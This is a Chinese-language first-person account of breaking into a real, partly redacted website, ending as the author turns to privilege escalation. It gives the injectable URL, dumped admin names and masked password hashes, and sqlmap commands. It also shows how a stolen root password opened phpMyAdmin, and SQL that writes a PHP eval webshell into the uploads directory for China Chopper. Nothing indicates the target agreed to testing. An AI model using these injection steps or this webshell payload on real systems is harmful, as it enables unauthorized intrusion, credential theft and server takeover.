渗透某网站linu提权+ssh后门.docVIP

渗透目标 真的网址我 .pjxxxx 服务器类型 Target: .pjxxx/showpr?pid=7155 Host IP: xxx.xx.xx.148 Web Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 Powered-by: PHP/5.2.13 DB Server: MySQL =5 Current DB: pjxx ----------------------------------------------------------------------------------------------------------------- 注入点 .pjxx/showpr?pid=7155 爆出信息 Data Found: adminname=liuxxxxxx Data Found: password=df7ca2a8exxxxxx Liuxxxxxx liuxxxxx Data Found: adminname=root Data Found: password=66497fbbxxxxxxxx root lxxxxxx 这里信息我修改下。 ---------------------------------------------------------------------------------------------------------------------- 后台地址： .pjxxx/admincp 成功 进入 后台 Data Found: adminname=liuxxxxxx Data Found: password=df7ca2a8e7xxxxxx liuxxxxx 没发现能利用的地方 可能 有的朋友想 root 都出来了 怎么不去phpmyadmin 呵呵 第一次渗透的时候 没找到后台 总之这个站我看了好久…..继续 爆出网站路径 先留着后面用 .pjxxx/admin/news require_once(./include/common.inc) /home/pjxx/admin/news .pjxx/bbs/config.inc 原来扫没出来 这次 随便一试 出来了 真是 坑爹啊 root 去登录赛…… .pjxxx/phpadmin/ 好吧 再次 坑爹 测试前面的两个帐号都不能登录 我也忘了 这是第几天了….. Sqlmap 注入 测试 这里我用他因为我的萝卜头 不好使 查看数据库 sqlmap.py -u .pjxxx/showpr?pid=7155 --dbs -v 看指定库的表 sqlmap.py -u .pjxxxx/showpr?pid=7155 –D 库名 --table Database: pjxx [168 tables] +----------------------+ | cdb_access | | cdb_activities | | cdb_activityapplies | | cdb_adminactions | | cdb_admincustom | | cdb_admingroups | | cdb_adminnotes | |-------省略一些 sqlmap.py -u .pjxx/showpr?pid=7155 –columns –T --+表 没加好 .pj9xxnet/uc/admin?m=usera=loginiframe=sid= 找不到密码 先放几天…… 话说这个站 我看了好久…..不甘心 就一直在搞 中间我去请教大牛了 嘎嘎 最后突破口是sqlmap读配置文件….. 好吧我真不会这个…. 读配置文件 为了解密害我到2点才睡。小菜我不会啊。关电脑我想到 win7下有个目录的，先睡觉…. 第二天 原来这么看……. 我日…… 记事本打开 登录 .pjxxx/phpadmin/ 用户 root 密码 xxxxxxxxxx 这样 就可以 phpmyadmin 写一句话了 不会的百度吧反正我是第一次我百度 的 网站绝对路径 /home/pjxx/ 这是n天前搞到的 我是按照这个方法来弄的 Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(?php @eval($_POST[cmd])?); SELECT * FROM `a` WHERE 1 into outfile /home/pjxx/uploads/mao 菜刀 接下来提权